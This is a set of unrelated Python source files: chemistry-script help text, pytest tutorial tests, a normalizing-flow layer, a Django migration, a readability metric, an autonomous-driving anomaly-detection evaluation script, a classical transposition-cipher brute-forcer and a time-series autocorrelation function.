The default value of chunkSize is dependent on the value of 'inputDataMode'.
The mp.Pool.map() function, invoked during 'InMemory' input data mode,
automatically converts RDKit data iterable into a list, loads all data into
memory, and calculates the default chunkSize using the following method
as shown in its code:
chunkSize, extra = divmod(len(dataIterable), len(numProcesses) * 4)
if extra: chunkSize += 1
For example, the default chunkSize will be 7 for a pool of 4 worker processes
and 100 data items.
The mp.Pool.imap() function, invoked during 'Lazy' input data mode, employs
'lazy' RDKit data iterable to retrieve data as needed, without loading all the
data into memory. Consequently, the size of input data is not known a priori.
It's not possible to estimate an optimal value for the chunkSize. The default
chunkSize is set to 1.
The default value for the chunkSize during 'Lazy' data mode may adversely
impact the performance due to the overhead associated with exchanging
small chunks of data. It is generally a good idea to explicitly set chunkSize to
a larger value during 'Lazy' input data mode, based on the size of your input
data and number of processes in the process pool.
The mp.Pool.map() function waits for all worker processes to process all
the data and return the results. The mp.Pool.imap() function, however,
returns the the results obtained from worker processes as soon as the
results become available for specified chunks of data.
The order of data in the results returned by both mp.Pool.map() and
mp.Pool.imap() functions always corresponds to the input data.
-o, --outfile <outfile>
Output file name.
--outfileParams <Name,Value,...> [default: auto]
A comma delimited list of parameter name and value pairs for writing
molecules to files. The supported parameter names for different file
formats, along with their default values, are shown below:
SD: kekulize,no
--overwrite
Overwrite existing files.
-q, --quiet <yes or no> [default: no]
Use quiet mode. The warning and information messages will not be printed.
-r, --removeHydrogens <yes or no> [default: Yes]
Remove hydrogens after minimization.
--randomSeed <number> [default: auto]
Seed for the random number generator for reproducing 3D coordinates.
Default is to use a random seed.
-w, --workingdir <dir>
Location of working directory which defaults to the current directory.
Examples:
To generate up to 250 conformations using ETKDG methodology followed by MMFF
forcefield minimization for a maximum of 500 iterations for molecules in a SMILES file
and write out a SD file containing minimum energy structure corresponding to each
molecule, type:
% RDKitPerformMinimization.py -i Sample.smi -o SampleOut.sdf
To rerun the first example in a quiet mode and write out a SD file, type:
% RDKitPerformMinimization.py -q yes -i Sample.smi -o SampleOut.sdf
To run the first example in multiprocessing mode on all available CPUs
without loading all data into memory and write out a SD file, type:
% RDKitPerformMinimization.py --mp yes -i Sample.smi -o SampleOut.sdf
To run the first example in multiprocessing mode on all available CPUs
by loading all data into memory and write out a SD file, type:
% RDKitPerformMinimization.py --mp yes --mpParams "inputDataMode,
InMemory" -i Sample.smi -o SampleOut.sdf
To run the first example in multiprocessing mode on specific number of
CPUs and chunk size without loading all data into memory and write out a SD file,
type:
% RDKitPerformMinimization.py --mp yes --mpParams "inputDataMode,Lazy,
numProcesses,4,chunkSize,8" -i Sample.smi -o SampleOut.sdf
To generate up to 150 conformations using ETKDG methodology followed by MMFF
forcefield minimization for a maximum of 250 iterations along with a specified random
seed for molecules in a SMILES file and write out a SD file containing minimum energy
structures corresponding to each molecule, type
% RDKitPerformMinimization.py --maxConfs 150 --randomSeed 201780117
--maxIters 250 -i Sample.smi -o SampleOut.sdf
To minimize structures in a 3D SD file using UFF forcefield for a maximum of 150
iterations without generating any conformations and write out a SD file containing
minimum energy structures corresponding to each molecule, type
% RDKitPerformMinimization.py -c None -f UFF --maxIters 150
-i Sample3D.sdf -o SampleOut.sdf
To generate up to 50 conformations using SDG methodology followed
by UFF forcefield minimization for a maximum of 50 iterations for
molecules in a CSV SMILES file, SMILES strings in column 1, name in
column 2, and write out a SD file, type:
% RDKitPerformMinimization.py --maxConfs 50 --maxIters 50 -c SDG
-f UFF --infileParams "smilesDelimiter,comma,smilesTitleLine,yes,
smilesColumn,1,smilesNameColumn,2" -i SampleSMILES.csv
-o SampleOut.sdf
Author:
Manish Sud(msud@san.rr.com)
See also:
RDKitCalculateRMSD.py, RDKitCalculateMolecularDescriptors.py, RDKitCompareMoleculeShapes.py,
RDKitConvertFileFormat.py, RDKitGenerateConformers.py, RDKitPerformConstrainedMinimization.py
Copyright:
Copyright (C) 2020 Manish Sud. All rights reserved.
The functionality available in this script is implemented using RDKit, an
open source toolkit for cheminformatics developed by Greg Landrum.
This file is part of MayaChemTools.
MayaChemTools is free software; you can redistribute it and/or modify it under
the terms of the GNU Lesser General Public License as published by the Free
Software Foundation; either version 3 of the License, or (at your option) any
later version.
"""
if __name__ == "__main__":
main()
|
from tutorial import math_func
import sys
import pytest
@pytest.mark.skipif(sys.version_info < (3, 3), \
reason="I don't want to test this.")
def test_add():
assert math_func.add(7, 3) == 10
assert math_func.add(7) == 9
assert math_func.add(5) == 7
print("hello")
@pytest.mark.number
def test_product():
assert math_func.product(3, 7) == 21
assert math_func.product(3, 0) == 0
assert math_func.product(5) == 10
@pytest.mark.string
def test_add_strings():
result = math_func.add('Hello', ' World')
assert result == 'Hello World'
assert type(result) is str
assert 'Heldlo' not in result
@pytest.mark.string
def test_product_strings():
assert math_func.product('Hello ', 3) == 'Hello Hello Hello '
result = math_func.product('Hello ')
assert result == 'Hello Hello '
assert type(result) is str
assert 'Hello' in result
def test_add_float():
result = math_func.add(10.5, 25.5)
assert result == 36
@pytest.mark.custom
@pytest.mark.parametrize('x, y, result',
[
(7, 3, 10),
('Hello', ' World', 'Hello World'),
(10.5, 25.5, 36),
]
)
def test_all_add(x, y, result):
assert math_func.add(x, y) == result
|
"""
(Pseudo-) Orthogonal Linear Layers. Advantage: Jacobian determinant is unity.
"""
import torch
from bgflow.nn.flow.base import Flow
__all__ = ["PseudoOrthogonalFlow"]
# Note: OrthogonalPPPP is implemented in pppp.py
class PseudoOrthogonalFlow(Flow):
"""Linear flow W*x+b with a penalty function
penalty_parameter*||W^T W - I||^2
Attributes
----------
dim : int
dimension
shift : boolean
Whether to use a shift parameter (+b). If False, b=0.
penalty_parameter : float
Scaling factor for the orthogonality constraint.
"""
def __init__(self, dim, shift=True, penalty_parameter=1e5):
super(PseudoOrthogonalFlow, self).__init__()
self.dim = dim
self.W = torch.nn.Parameter(torch.eye(dim))
if shift:
self.b = torch.nn.Parameter(torch.zeros(dim))
else:
self.register_buffer("b", torch.tensor(0.0))
self.register_buffer("penalty_parameter", torch.tensor(penalty_parameter))
def _forward(self, x, **kwargs):
"""Forward transform.
Attributes
----------
x : torch.tensor
The input vector. The transform is applied to the last dimension.
kwargs : dict
keyword arguments to satisfy the interface
Returns
-------
y : torch.tensor
W*x + b
dlogp : torch.tensor
natural log of the Jacobian determinant
"""
dlogp = torch.zeros(*x.shape[:-1], 1).to(x)
y = torch.einsum("ab,...b->...a", self.W, x)
return y + self.b, dlogp
def _inverse(self, y, **kwargs):
"""Inverse transform assuming that W is orthogonal.
Attributes
----------
y : torch.tensor
The input vector. The transform is applied to the last dimension.
kwargs : dict
keyword arguments to satisfy the interface
Returns
-------
x : torch.tensor
W^T*(y-b)
dlogp : torch.tensor
natural log of the Jacobian determinant
"""
dlogp = torch.zeros(*y.shape[:-1], 1).to(y)
x = torch.einsum("ab,...b->...a", self.W.transpose(1, 0), y - self.b)
return x, dlogp
def penalty(self):
"""Penalty function for the orthogonality constraint
p(W) = penalty_parameter * ||W^T*W - I||^2.
Returns
-------
penalty : float
Value of the penalty function
"""
return self.penalty_parameter * torch.sum((torch.eye(self.dim) - torch.mm(self.W.transpose(1, 0), self.W)) ** 2)
|
# Generated by Django 2.0.7 on 2018-07-23 10:42
from django.db import migrations
class Migration(migrations.Migration):
dependencies = [
('api', '0010_remove_populationdetailed_code'),
('api', '0013_merge_20180723_0744'),
]
operations = [
]
|
from math import sqrt
from unravel.text.readability import BaseReadability
from unravel.text import ReadingLevel
class SimpleMeasureOfGobbledygook(BaseReadability):
"""
The SMOG grade is a measure of readability that estimates the years of education needed to understand a
piece of writing. It gives the estimated grade required to fully understand a piece of text.
SMOG is an acronym for Simple Measure of Gobbledygook.
SMOG is widely used, particularly for checking health messages.
Description from https://en.wikipedia.org/wiki/SMOG
0.4 x ((total words / total sentences) + 100 * (total complex words / total words))
"""
name = 'Simple Measure of Gobbledygook'
slug = 'simple_measure_of_gobbledygook'
def calc(self, text: str) -> ReadingLevel:
if not text:
return ReadingLevel(self.name)
text_info = self._text_analyser.get_text_info(text)
sentences = text_info.sentence_count
polysyllable_words = text_info.polysyllable_count
if sentences < 1:
return ReadingLevel(self.name)
if sentences < 30:
self._logger.warning('Calculating SMOG readability on text with fewer '
'than 30 sentences ({})'.format(sentences))
result = 1.0430 * sqrt(polysyllable_words * 30.0 / sentences) + 3.1291
if result < 0:
result = 0
reading = ReadingLevel(self.name, index=result, level=int(result), age=int(result) + 4)
return reading
|
# Copyright 2021 Testing Automated @ Università della Svizzera italiana (USI)
# All rights reserved.
# This file is part of the project SelfOracle, a misbehaviour predictor for autonomous vehicles,
# developed within the ERC project PRECRIME
# and is released under the "MIT License Agreement". Please see the LICENSE
# file that should have been included as part of this package.
import csv
import gc
import os
import matplotlib.pyplot as plt
import numpy as np
import pandas as pd
from keras import backend as K
from scipy.stats import gamma
from sklearn.metrics import precision_score, recall_score, f1_score, roc_curve, roc_auc_score, precision_recall_curve, \
auc
from tqdm import tqdm
import utils
from config import Config
from selforacle.utils_vae import load_vae
from selforacle.vae import normalize_and_reshape, RESIZED_IMAGE_HEIGHT, RESIZED_IMAGE_WIDTH, IMAGE_CHANNELS
from utils import load_all_images
from utils import plot_reconstruction_losses
np.random.seed(0)
def load_or_compute_losses(anomaly_detector, dataset, cached_file_name, delete_cache):
losses = []
current_path = os.getcwd()
cache_path = os.path.join(current_path, 'cache', cached_file_name + '.npy')
if delete_cache:
if os.path.exists(cache_path):
os.remove(cache_path)
print("delete_cache=true. Removed losses cache file " + cached_file_name)
try:
losses = np.load(cache_path)
losses = losses.tolist()
print("Found losses data_nominal for " + cached_file_name)
return losses
except FileNotFoundError:
print("Losses data_nominal for " + cached_file_name + " not found. Computing...")
for x in tqdm(dataset):
x = utils.resize(x)
x = normalize_and_reshape(x)
# sanity check
# z_mean, z_log_var, z = anomaly_detector.encoder.predict(x)
# decoded = anomaly_detector.decoder.predict(z)
# reconstructed = anomaly_detector.predict(x)
loss = anomaly_detector.test_on_batch(x)[1] # total loss
losses.append(loss)
np_losses = np.array(losses)
np.save(cache_path, np_losses)
print("Losses data_nominal for " + cached_file_name + " saved.")
return losses
def plot_picture_orig_dec(orig, dec, picture_name, losses, num=10):
n = num
plt.figure(figsize=(40, 8))
for i in range(n):
# display original
ax = plt.subplot(2, n, i + 1)
plt.imshow(orig[i].reshape(RESIZED_IMAGE_HEIGHT, RESIZED_IMAGE_WIDTH, IMAGE_CHANNELS))
ax.get_xaxis().set_visible(False)
ax.get_yaxis().set_visible(False)
plt.title("Original Photo")
# display reconstruction
ax = plt.subplot(2, n, i + 1 + n)
plt.imshow(dec[i].reshape(RESIZED_IMAGE_HEIGHT, RESIZED_IMAGE_WIDTH, IMAGE_CHANNELS))
ax.get_xaxis().set_visible(False)
ax.get_yaxis().set_visible(False)
plt.title("Reconstructed loss %.4f" % losses[i])
plt.savefig(picture_name, bbox_inches='tight')
plt.show()
plt.close()
def get_results_mispredictions(cfg, sim_name, name,
losses_on_nominal, losses_on_anomalous,
data_df_nominal, data_df_anomalous,
seconds_to_anticipate):
# only occurring when conditions == unexpected
true_positive_windows = 0
false_negative_windows = 0
# only occurring when conditions == nominal
false_positive_windows = 0
true_negative_windows = 0
# get threshold on nominal data_nominal
threshold = get_threshold(losses_on_nominal, conf_level=0.95)
'''
prepare dataset to get TP and FN from unexpected
'''
number_frames_anomalous = pd.Series.max(data_df_anomalous['frameId'])
simulation_time_anomalous = pd.Series.max(data_df_anomalous['time'])
fps_anomalous = number_frames_anomalous // simulation_time_anomalous
crashed_anomalous = data_df_anomalous['crashed']
crashed_anomalous.is_copy = None
# creates the ground truth
all_first_frame_position_crashed_sequences = []
for idx, item in enumerate(crashed_anomalous):
if idx == number_frames_anomalous:
continue
if crashed_anomalous[idx] == 0 and crashed_anomalous[idx + 1] == 1:
first_index_crash = idx + 1
all_first_frame_position_crashed_sequences.append(first_index_crash)
print("first_index_crash: %d" % first_index_crash)
print("identified %d crash sequences" % len(all_first_frame_position_crashed_sequences))
print(all_first_frame_position_crashed_sequences)
frames_to_reassign = fps_anomalous * seconds_to_anticipate
reaction_frames = pd.Series()
for item in all_first_frame_position_crashed_sequences:
crashed_anomalous.loc[[item - frames_to_reassign, item]] = 1
reaction_frames = reaction_frames.append(crashed_anomalous[item - frames_to_reassign:item])
print("frames between %d and %d have been labelled as 1" % (item - frames_to_reassign, item))
print("reaction frames size %d" % len(reaction_frames))
sma_anomalous = pd.Series(losses_on_anomalous)
# sma_anomalous = losses.rolling(fps_anomalous, min_periods=1).mean()
# iterate over losses_on_anomalous and crashed_anomalous jointly and remove frames labelled as 0
assert len(sma_anomalous) == len(crashed_anomalous)
idx_to_remove = []
for idx, loss in enumerate(sma_anomalous):
if crashed_anomalous[idx] == 0:
idx_to_remove.append(idx)
crashed_anomalous = crashed_anomalous.drop(crashed_anomalous.index[idx_to_remove])
sma_anomalous = sma_anomalous.drop(sma_anomalous.index[idx_to_remove])
num_windows_anomalous = len(crashed_anomalous) // fps_anomalous
frames_to_remove = (len(crashed_anomalous) - (fps_anomalous * num_windows_anomalous)) - 1
crashed_anomalous = crashed_anomalous[:-frames_to_remove]
sma_anomalous = sma_anomalous[:-frames_to_remove]
assert len(crashed_anomalous) == len(sma_anomalous)
prediction = []
for idx, loss in enumerate(sma_anomalous):
# print("idx %d" % idx)
if idx != 0 and idx % fps_anomalous == 0:
# print("window [%d - %d]" % (idx - fps_anomalous, idx))
window_mean = pd.Series(sma_anomalous.iloc[idx - fps_anomalous:idx]).mean()
crashed_mean = pd.Series(crashed_anomalous[idx - fps_anomalous:idx]).mean()
if window_mean >= threshold:
if crashed_mean > 0:
true_positive_windows += 1
prediction.extend([1] * fps_anomalous)
else:
raise ValueError
elif window_mean < threshold:
if crashed_mean > 0:
false_negative_windows += 1
prediction.extend([0] * fps_anomalous)
else:
raise ValueError
# print("true positives: %d - false negatives: %d" % (true_positive_windows, false_negative_windows))
assert false_negative_windows + true_positive_windows == num_windows_anomalous
crashed_anomalous = crashed_anomalous[:-1]
sma_anomalous = sma_anomalous[:-1]
assert len(prediction) == len(crashed_anomalous) == len(sma_anomalous)
'''
prepare dataset to get FP and TN from unexpected
'''
number_frames_nominal = pd.Series.max(data_df_nominal['frameId'])
simulation_time_nominal = pd.Series.max(data_df_nominal['time'])
fps_nominal = number_frames_nominal // simulation_time_nominal
crashed_nominal = data_df_nominal['crashed']
crashed_nominal.is_copy = None
num_windows_nominal = len(crashed_nominal) // fps_nominal
num_to_delete = len(crashed_nominal) - (num_windows_nominal * fps_nominal) - 1
crashed_nominal = crashed_nominal[:-num_to_delete]
losses_nominal = losses_on_nominal[:-num_to_delete]
assert len(crashed_nominal) == len(losses_nominal)
losses = pd.Series(losses_nominal)
sma_nominal = losses.rolling(fps_nominal, min_periods=1).mean()
assert len(crashed_nominal) == len(losses) == len(sma_nominal)
for idx, loss in enumerate(sma_nominal):
if idx != 0 and idx % fps_nominal == 0:
# print("window [%d - %d]" % (idx - fps_nominal, idx))
window_mean = pd.Series(sma_nominal.iloc[idx - fps_nominal:idx]).mean()
crashed_mean = pd.Series(crashed_nominal[idx - fps_nominal:idx]).mean()
if window_mean >= threshold:
if crashed_mean == 0:
false_positive_windows += 1
prediction.extend([1] * fps_nominal)
# print("window [%d - %d]" % (idx - fps_nominal, idx))
else:
raise ValueError
elif window_mean < threshold:
if crashed_mean == 0:
true_negative_windows += 1
prediction.extend([0] * fps_nominal)
# print("prediction size %d" % len(prediction))
else:
raise ValueError
print("false positives: %d - true negatives: %d" % (false_positive_windows, true_negative_windows))
# print("prediction size %d" % len(prediction))
assert false_positive_windows + true_negative_windows == num_windows_nominal
crashed_nominal = crashed_nominal[:-1]
sma_nominal = crashed_nominal[:-1]
assert len(prediction) == (len(crashed_anomalous) + len(crashed_nominal))
crashed = pd.concat([crashed_anomalous, crashed_nominal])
assert len(prediction) == len(crashed)
print("time to misbehaviour (s): %d" % seconds_to_anticipate)
# Calculate and print precision and recall as percentages
print("Precision: " + str(round(precision_score(crashed, prediction) * 100, 1)) + " % ")
print("Recall: " + str(round(recall_score(crashed, prediction) * 100, 1)) + " % ")
# Obtain and print F1 score as a percentage
print("F1 score: " + str(round(f1_score(crashed, prediction) * 100, 1)) + " %")
fpr, tpr, thresholds = roc_curve(crashed, prediction)
# Obtain and print AUC-ROC
print("AUC-ROC: " + str(round(roc_auc_score(crashed, prediction), 3)))
# plt.figure()
# plt.plot(fpr, tpr, label='ROC curve (area = %0.2f)' % round(roc_auc_score(crashed, prediction), 3))
# plt.plot([0, 1], [0, 1], color='black', label="Random", linestyle='--')
# plt.xlim([0.0, 1.0])
# plt.ylim([0.0, 1.05])
# plt.xlabel('False Positive Rate')
# plt.ylabel('True Positive Rate')
# plt.title('Receiver operating characteristic (detection time = %d s)' % seconds_to_anticipate)
# plt.legend(loc="lower right")
# plt.show()
precision, recall, _ = precision_recall_curve(crashed, prediction)
auc_score = auc(recall, precision)
print("AUC-PRC: " + str(round(auc_score, 3)) + "\n")
# plt.figure()
# plt.plot(recall, precision, label='PR curve (area = %0.2f)' % round(auc_score, 3))
# plt.plot([0, 1], [1, 0], color='black', label="Random", linestyle='--')
# plt.xlim([0.0, 1.0])
# plt.ylim([0.0, 1.05])
# plt.xlabel('Recall')
# plt.ylabel('Precision')
# plt.title('PR Curve (detection time = %d s)' % seconds_to_anticipate)
# plt.legend(loc="lower right")
# plt.show()
if not os.path.exists('novelty_detection.csv'):
with open('novelty_detection.csv', mode='w', newline='') as class_imbalance_result_file:
writer = csv.writer(class_imbalance_result_file, delimiter=',', quotechar='"', quoting=csv.QUOTE_MINIMAL,
lineterminator='\n')
writer.writerow(
["simulation", "autoencoder", "ttd", "precision", "recall", "f1", "auc", "aucprc"])
writer.writerow([sim_name, name, seconds_to_anticipate,
str(round(precision_score(crashed, prediction) * 100, 1)),
str(round(recall_score(crashed, prediction) * 100, 1)),
str(round(f1_score(crashed, prediction) * 100, 1)),
str(round(roc_auc_score(crashed, prediction), 3)),
str(round(auc_score, 3))])
else:
with open('novelty_detection.csv', mode='a') as novelty_detection_result_file:
writer = csv.writer(novelty_detection_result_file, delimiter=',', quotechar='"', quoting=csv.QUOTE_MINIMAL,
lineterminator='\n')
writer.writerow([sim_name, name, seconds_to_anticipate,
str(round(precision_score(crashed, prediction) * 100, 1)),
str(round(recall_score(crashed, prediction) * 100, 1)),
str(round(f1_score(crashed, prediction) * 100, 1)),
str(round(roc_auc_score(crashed, prediction), 3)),
str(round(auc_score, 3))])
if seconds_to_anticipate == 3:
writer.writerow(["", "", "", "", "", "", "", ""])
def get_threshold(losses, conf_level=0.95):
# print("Fitting reconstruction error distribution using Gamma distribution")
shape, loc, scale = gamma.fit(losses, floc=0)
# print("Creating thresholds using the confidence intervals: %s" % conf_level)
t = gamma.ppf(conf_level, shape, loc=loc, scale=scale)
print('threshold: ' + str(t))
return t
def get_scores(cfg, name, new_losses, losses, threshold):
# only occurring when conditions == unexpected
true_positive = []
false_negative = []
# only occurring when conditions == nominal
false_positive = []
true_negative = []
# required for adaptation
likely_true_positive_unc = []
likely_false_positive_cte = []
likely_false_positive_unc = []
likely_true_positive_cte = []
likely_true_negative_unc = []
likely_false_negative_unc = []
likely_true_negative_cte = []
likely_false_negative_cte = []
# get threshold
if threshold is not None:
threshold = threshold
else:
threshold = get_threshold(losses, conf_level=0.95)
# load the online uncertainty from csv
path = os.path.join(cfg.TESTING_DATA_DIR,
cfg.SIMULATION_NAME,
'driving_log.csv')
data_df = pd.read_csv(path)
uncertainties = data_df["uncertainty"]
cte_values = data_df["cte"]
crashed_values = data_df["crashed"]
cfg.UNCERTAINTY_TOLERANCE_LEVEL = get_threshold(uncertainties, conf_level=0.95)
print("loaded %d uncertainty and %d CTE values" % (len(uncertainties), len(cte_values)))
for idx, loss in enumerate(losses):
if loss >= threshold:
# autoencoder based
if crashed_values[idx] == 0:
false_positive.append(idx)
elif crashed_values[idx] == 1:
true_positive.append(idx)
# uncertainty based
if uncertainties[idx] < cfg.UNCERTAINTY_TOLERANCE_LEVEL:
likely_false_positive_unc.append(idx)
else:
likely_true_positive_unc.append(idx)
# cte based
if cte_values[idx] < cfg.CTE_TOLERANCE_LEVEL:
likely_false_positive_cte.append(idx)
else:
likely_true_positive_cte.append(idx)
elif loss < threshold: # either FN/TN
# autoencoder based
if crashed_values[idx] == 0:
true_negative.append(idx)
elif crashed_values[idx] == 1:
false_negative.append(idx)
# uncertainty based
if uncertainties[idx] > cfg.UNCERTAINTY_TOLERANCE_LEVEL:
likely_true_negative_unc.append(idx)
else:
likely_false_negative_unc.append(idx)
# cte based
if cte_values[idx] > cfg.CTE_TOLERANCE_LEVEL:
likely_true_negative_cte.append(idx)
else:
likely_false_negative_cte.append(idx)
assert len(losses) == (len(true_positive) + len(false_negative) +
len(false_positive) + len(true_negative))
assert len(losses) == (len(likely_true_positive_unc) + len(likely_false_negative_unc) +
len(likely_false_positive_unc) + len(likely_true_negative_unc))
assert len(losses) == (len(likely_true_positive_cte) + len(likely_false_negative_cte) +
len(likely_false_positive_cte) + len(likely_true_negative_cte))
print("true_positive: %d" % len(true_positive))
print("false_negative: %d" % len(false_negative))
print("false_positive: %d" % len(false_positive))
print("true_negative: %d" % len(true_negative))
print("")
print("likely_true_positive (unc): %d" % len(likely_true_positive_unc))
print("likely_false_negative (unc): %d" % len(likely_false_negative_unc))
print("likely_false_positive (unc): %d" % len(likely_false_positive_unc))
print("likely_true_negative (unc): %d" % len(likely_true_negative_unc))
print("")
print("likely_true_positive (cte): %d" % len(likely_true_positive_cte))
print("likely_false_negative (cte): %d" % len(likely_false_negative_cte))
print("likely_false_positive (cte): %d" % len(likely_false_positive_cte))
print("likely_true_negative (cte): %d" % len(likely_true_negative_cte))
# compute average catastrophic forgetting
catastrophic_forgetting = np.empty(2)
catastrophic_forgetting[:] = np.NaN
if losses != new_losses:
assert len(losses) == len(new_losses)
errors = list()
for idx, loss in enumerate(losses):
loss_original = losses[idx]
loss_new = new_losses[idx]
if loss_new > loss_original:
errors.append(loss_new - loss_original)
catastrophic_forgetting = list()
catastrophic_forgetting.append(np.mean(errors))
catastrophic_forgetting.append(np.std(errors))
print(
f"catastrophic forgetting (mean/std): {catastrophic_forgetting[0]:.2f} +- {catastrophic_forgetting[1]:.2f}")
if not os.path.exists('class_imbalance.csv'):
with open('class_imbalance.csv', mode='w', newline='') as class_imbalance_result_file:
writer = csv.writer(class_imbalance_result_file, delimiter=',', quotechar='"', quoting=csv.QUOTE_MINIMAL,
lineterminator='\n')
writer.writerow(["autoencoder", "fp", "lfp_unc", "lfp_cte", "mean_CF", "std_CF"])
writer.writerow([name, len(false_positive), len(likely_false_positive_unc), len(likely_false_positive_cte),
round(catastrophic_forgetting[0], 4),
round(catastrophic_forgetting[1], 4)])
else:
with open('class_imbalance.csv', mode='a') as class_imbalance_result_file:
writer = csv.writer(class_imbalance_result_file, delimiter=',', quotechar='"', quoting=csv.QUOTE_MINIMAL,
lineterminator='\n')
writer.writerow([name, len(false_positive), len(likely_false_positive_unc), len(likely_false_positive_cte),
round(catastrophic_forgetting[0], 4),
round(catastrophic_forgetting[1], 4)])
return likely_false_positive_unc, likely_false_positive_cte, catastrophic_forgetting
def load_and_eval_vae(cfg, dataset, delete_cache):
vae, name = load_vae(cfg, load_vae_from_disk=True)
path = os.path.join(cfg.TESTING_DATA_DIR,
cfg.SIMULATION_NAME,
'driving_log.csv')
data_df = pd.read_csv(path)
losses = load_or_compute_losses(vae, dataset, name, delete_cache)
threshold_nominal = get_threshold(losses, conf_level=0.95)
plot_reconstruction_losses(losses, None, name, threshold_nominal, None, data_df)
lfp_unc, lfp_cte, _ = get_scores(cfg, name, losses, losses, threshold_nominal)
del vae
K.clear_session()
gc.collect()
def main():
os.chdir(os.getcwd().replace('script', ''))
print(os.getcwd())
cfg = Config()
cfg.from_pyfile("config_my.py")
dataset = load_all_images(cfg)
load_and_eval_vae(cfg, dataset, delete_cache=True)
if __name__ == '__main__':
main()
|
# Transposition Cipher Hacker
from .transposition_decryption import decrypt_message
def main():
my_message = """Cb b rssti aieih rooaopbrtnsceee er es no npfgcwu plri ch nitaalr eiuengiteehb(e1
hilincegeoamn fubehgtarndcstudmd nM eu eacBoltaetee oinebcdkyremdteghn.aa2r81a condari fmps" tad l t oisn sit
u1rnd stara nvhn fs edbh ee,n e necrg6 8nmisv l nc muiftegiitm tutmg cm shSs9fcie ebintcaets h a ihda cctrhe
ele 1O7 aaoem waoaatdahretnhechaopnooeapece9etfncdbgsoeb uuteitgna. rteoh add e,D7c1Etnpneehtn beete" evecoal
lsfmcrl iu1cifgo ai. sl1rchdnheev sh meBd ies e9t)nh,htcnoecplrrh ,ide hmtlme. pheaLem,toeinfgn t e9yce da' eN
eMp a ffn Fc1o ge eohg dere.eec s nfap yox hla yon. lnrnsreaBoa t,e eitsw il ulpbdofg BRe bwlmprraio po droB
wtinue r Pieno nc ayieeto'lulcih sfnc ownaSserbereiaSm -eaiah, nnrttgcC maciiritvledastinideI nn rms iehn
tsigaBmuoetcetias rn """
hacked_message = hack_transposition(my_message)
if hacked_message is None:
print('Failed to hack encryption.')
else:
print('Copying hacked message to clipboard:')
print(hacked_message)
def hack_transposition(message):
print('Hacking...')
# Python programs can be stopped at any time by pressing
# Ctrl-C (on Windows)
# Ctrl-D (on Mac and Linux)
print('(Press Ctrl-C or Ctrl-D to quit at any time.)')
# brute-force by looping through every possible key
for key in range(1, len(message)):
print('Trying key #%s...' % key)
decrypted_text = decrypt_message(key, message)
if detect_english.isEnglish(decrypted_text):
# Check with user to see if the decrypted key has been found.
print()
print('Possible encryption hack:')
print('Key %s: %s' % (key, decrypted_text[:100]))
print()
print('Enter D for done, or just press Enter to continue hacking:')
response = input('> ')
if response.strip().upper().startswith('D'):
return decrypted_text
return None
if __name__ == '__main__':
main()
|
from brightics.common.repr import BrtcReprBuilder, strip_margin, pandasDF2MD, plt2MD
from brightics.function.utils import _model_dict
from brightics.common.groupby import _function_by_group
from brightics.common.utils import check_required_parameters
from statsmodels.graphics.tsaplots import plot_acf
from statsmodels.graphics.tsaplots import plot_pacf
from statsmodels.tsa.stattools import acf
from statsmodels.tsa.stattools import pacf
import pandas as pd
from matplotlib import pyplot as plt
def autocorrelation(table, group_by=None, **params):
check_required_parameters(_autocorrelation, params, ['table'])
if group_by is not None:
grouped_model = _function_by_group(_autocorrelation, table, group_by=group_by, **params)
return grouped_model
else:
return _autocorrelation(table, **params)
def _autocorrelation(table, input_col, nlags=20, conf_level=0.95):
data = table[input_col]
plt.figure()
plot_acf(data, lags=nlags, alpha=1 - conf_level)
fig_plt_acf = plt2MD(plt)
plt.clf()
plt.figure()
plot_pacf(data, lags=nlags, alpha=1 - conf_level)
fig_plt_pacf = plt2MD(plt)
plt.clf()
acf_ret = acf(data, nlags=nlags, alpha=1-conf_level)
pacf_ret = pacf(data, nlags=nlags, alpha=1-conf_level)
result_table1 = pd.DataFrame([])
result_table1['lag'] = list(range(nlags + 1))
result_table1['ACF'] = acf_ret[0]
if conf_level is not None:
result_table1['%g%% confidence Interval' % (conf_level * 100)] = [str((acf_ret[1][i][0], acf_ret[1][i][1])) for i in range(nlags + 1)]
result_table2 = pd.DataFrame([])
result_table2['lag'] = list(range(nlags + 1))
result_table2['PACF'] = pacf_ret[0]
if conf_level is not None:
result_table2['%g%% confidence Interval' % (conf_level * 100)] = [str((pacf_ret[1][i][0], pacf_ret[1][i][1])) for i in range(nlags + 1)]
rb = BrtcReprBuilder()
rb.addMD(strip_margin("""# Autocorrelation / Partial Autocorrelation Result"""))
rb.addMD(strip_margin("""
|## Autocorrelation
|
|{image1}
|
|### Autocorrelation Table
|
|{result_table1}
|
|## Partial Autocorrelation
|
|{image2}
|
|### Partial Autocorrelation Table
|
|{result_table2}
|
""".format(image1=fig_plt_acf, result_table1=pandasDF2MD(result_table1, num_rows=nlags + 1), image2=fig_plt_pacf, result_table2=pandasDF2MD(result_table2, num_rows=nlags + 1))))
model = _model_dict('autocorrelation')
model['autocorrelation_table'] = result_table1
model['partial_autocorrelation_table'] = result_table2
model['_repr_brtc_'] = rb.get()
return {'model':model}
|
# -*-coding:Utf-8 -*
# Copyright (c) 2010-2017 LE GOFF Vincent
# All rights reserved.
#
# Redistribution and use in source and binary forms, with or without
# modification, are permitted provided that the following conditions are met:
#
# * Redistributions of source code must retain the above copyright notice, this
# list of conditions and the following disclaimer.
# * Redistributions in binary form must reproduce the above copyright notice,
# this list of conditions and the following disclaimer in the documentation
# and/or other materials provided with the distribution.
# * Neither the name of the copyright holder nor the names of its contributors
# may be used to endorse or promote products derived from this software
# without specific prior written permission.
#
# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS"
# AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
# IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE
# ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT OWNER OR CONTRIBUTORS BE
# LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR
# CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT
# OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS
# INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN
# CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE)
# ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE
# POSSIBILITY OF SUCH DAMAGE.
